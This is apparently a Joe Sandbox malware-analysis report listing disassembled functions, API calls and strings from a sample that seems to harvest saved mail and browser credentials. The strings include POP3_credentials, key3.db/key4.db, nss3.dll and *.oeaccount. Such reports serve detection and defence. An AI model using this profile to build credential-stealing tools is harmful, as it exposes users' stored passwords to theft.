                                                            • API String ID: 1631269929-4153097237
                                                            • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                            • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                            • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                            • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                            Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040810E
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,76BAE430,?), ref: 004081B9
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                            • API String ID: 524865279-2190619648
                                                            • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                            • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                            Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00406B8E
                                                            • strlen.MSVCRT ref: 00406B99
                                                            • strlen.MSVCRT ref: 00406BFF
                                                            • strlen.MSVCRT ref: 00406C0D
                                                            • strlen.MSVCRT ref: 00406BA7
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_mbscat_mbscpymemset
                                                            • String ID: key3.db$key4.db
                                                            • API String ID: 581844971-3557030128
                                                            • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                            • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                            • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                            • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                            Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                            • String ID: 0$6
                                                            • API String ID: 2300387033-3849865405
                                                            • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                            • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                            Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004076D7
                                                            • sprintf.MSVCRT ref: 00407704
                                                            • strlen.MSVCRT ref: 00407710
                                                            • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                            • strlen.MSVCRT ref: 00407733
                                                            • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpystrlen$memsetsprintf
                                                            • String ID: %s (%s)
                                                            • API String ID: 3756086014-1363028141
                                                            • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                            • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                            • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                            • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                            Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                            • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                            • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                            Strings
                                                            • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                            • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FromStringUuid$FreeTaskmemcpy
                                                            • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                            • API String ID: 1640410171-3316789007
                                                            • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                            • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                            • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                            • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                            Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf
                                                            • String ID: %2.2X
                                                            • API String ID: 125969286-791839006
                                                            • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                            • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                            Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                            • String ID: ACD
                                                            • API String ID: 1886237854-620537770
                                                            • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                            • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                            Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004091EC
                                                            • sprintf.MSVCRT ref: 00409201
                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                            • String ID: caption$dialog_%d
                                                            • API String ID: 2923679083-4161923789
                                                            • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                            • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                            Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                            Strings
                                                            • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                            • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                            • no such savepoint: %s, xrefs: 00426A02
                                                            • abort due to ROLLBACK, xrefs: 00428781
                                                            • unknown error, xrefs: 004277B2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                            • API String ID: 3510742995-3035234601
                                                            • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                            • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                            • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                            • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                            Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                            • API String ID: 2221118986-3608744896
                                                            • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                            • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                            • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                            • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                            Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                              • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemcpy
                                                            • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                            • API String ID: 1784268899-4153596280
                                                            • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                            • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                            • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                            • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                            Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                            • memset.MSVCRT ref: 00410246
                                                            • memset.MSVCRT ref: 00410258
                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                            • memset.MSVCRT ref: 0041033F
                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                            • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                            • String ID:
                                                            • API String ID: 3974772901-0
                                                            • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                            • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                            Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0044406C
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                            • strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                            • String ID:
                                                            • API String ID: 577244452-0
                                                            • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                            • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                            Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • _strcmpi.MSVCRT ref: 00404518
                                                            • _strcmpi.MSVCRT ref: 00404536
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi$memcpystrlen
                                                            • String ID: imap$pop3$smtp
                                                            • API String ID: 2025310588-821077329
                                                            • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                            • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                            Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C02D
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2726666094-3614832568
                                                            • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                            • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                            Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00403A88
                                                            • memset.MSVCRT ref: 00403AA1
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                            • strlen.MSVCRT ref: 00403AE9
